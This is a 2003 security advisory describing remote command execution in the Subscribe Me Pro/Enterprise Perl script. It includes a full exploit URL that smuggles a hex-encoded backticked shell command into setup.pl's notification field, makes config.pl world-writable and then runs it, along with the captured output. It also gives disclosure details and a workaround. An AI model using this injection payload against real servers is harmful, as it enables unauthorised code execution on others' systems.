Subscribe Me Pro/Enterprise - Remote Code Execution via Backticked Perl Variable Injection.

["Paul Craig - Pimp Industries" <headpimp () pimp-industries com>]

                Pimp industries.
                        "Its all about the Bling, Bitches and Fame!"


        Subscribe Me Pro/Enterprise (All recent versions of Pro/Enterprise)
        Remote Code Execution via Backticked Perl Variable Injection.
                        (C) Paul Craig
                                Pimp Industries 2003
This advisory is also online at: http://www.pimp-industries.com/pimp-0003.txt


Background
-------------
Subscribe me Pro/Enterprise is a mailing list management script developed
by siteinteractive.
(http://www.siteinteractive.com)
Various flaws exist in setup.pl that can allow an attacker to inject shell
commands using a backticked
variable injection flaw into config.pl, then exploiting a seccond flaw to
create config.pl with permissions of 777. Then run the injected shell
commands.


Exploit:
------------
This attack fools setup.pl into thinking that you have just installed
subscribe me and wish to set it up.
When doing this setup.pl will attempt to write all your configuration
variables to config.pl.
There is some input validation done in setup.pl, but this can be easily
bypassed by hex encoding all data that you send.

Run though of the exploit:

Firstly we connect and inject our exploit command of '/usr/bin/id > id'
and tell setup.pl to create all files with a mode of 777.
http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

This will return a page saying "Please set your administration password"
(you wont be able to).

This has now written the following data to config.pl
$notification = "" .`/usr/bin/id > id`  . ""; (note the backticks)
And config.pl is now set to -rwxrwxrwx.
Now we request http://victim.com/cgi-bin/config.pl to execute our perl.

And respectively http://victim.com/cgi-bin/id is now created.

uid=48(apache) gid=48(apache) groups=48(apache)

Using this exploit it is possible to inject any system commands.
Thats bad, very.


Company Status:
-------------
Company was contacted via email (support@) on Monday 15th December, they
were notified that the exploit would be released on the 19th of December,
and they were told how to fix the problem.
No reply was came back from the company, and no official fix has been
released.


Suggestions/Work Around:
-------------
Remove setup.pl once installed, also chmod config.pl to READ ONLY.


Company status
---------------
Pimp Industries is a privately owned security research company, if you are
intrested in any code auditing work done or would like to contact Pimp
Industries to discuss any nature of business, please email us at
headpimp () pimp-industries com.


Big Hellos to
-------------
Pinky, Kimathy, sozni, hx, decx and Santa (ive been really really good).


Paul Craig
Head Pimp , Security Researcher
Pimp Industries